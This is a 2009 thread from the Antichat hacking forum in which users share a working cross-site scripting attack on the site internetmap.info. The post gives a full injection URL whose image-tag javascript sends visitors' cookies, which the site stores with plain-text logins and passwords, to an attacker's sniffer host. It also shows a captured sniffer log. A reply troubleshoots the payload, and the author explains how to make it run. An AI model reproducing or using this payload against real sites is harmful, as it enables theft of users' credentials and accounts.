Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   internetmap.info XSS (https://forum.antichat.xyz/showthread.php?t=107832)

Dimi4 24.02.2009 20:56
internetmap.info XSS
 
internetmap.info XSS
Достаточно крупный проект. Пароли в куках там хранятся в чистом виде. При отправки на сниффер будет иметь вид:

Код:
Запрос с www.internetmap.info — 24.02.2009 16:35
        IP: **.**.**.** (whois)
QUERY: b=b; login=admin@mail.ru; password=Pass; b=b
REFERER: http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%20new%20Image()%3b%20img.src%20=%20%22http://www*.com/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
AGENT: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Скрипт декодить URL, обрезает спецсимволы (; в том числе). Формируем иньекцию:
Код:

http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%20new%20Image()%3b%20img.src%20=%20%22http://снифер/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
© Dimi4, 2009

_==wolf==_ 26.02.2009 22:23
хтмл код полученный в результате прохожа по этому урл

Код:
a=_<img src='javascript:img = new Image()%3  b img.src = "http://sniff.com/sniff.jpg?"+document.cookie;'>
помоему здесь что-то не так хДДДД

Dimi4 26.02.2009 22:59
пробелы, которые форум добавил - поудаляй.


Время: 23:24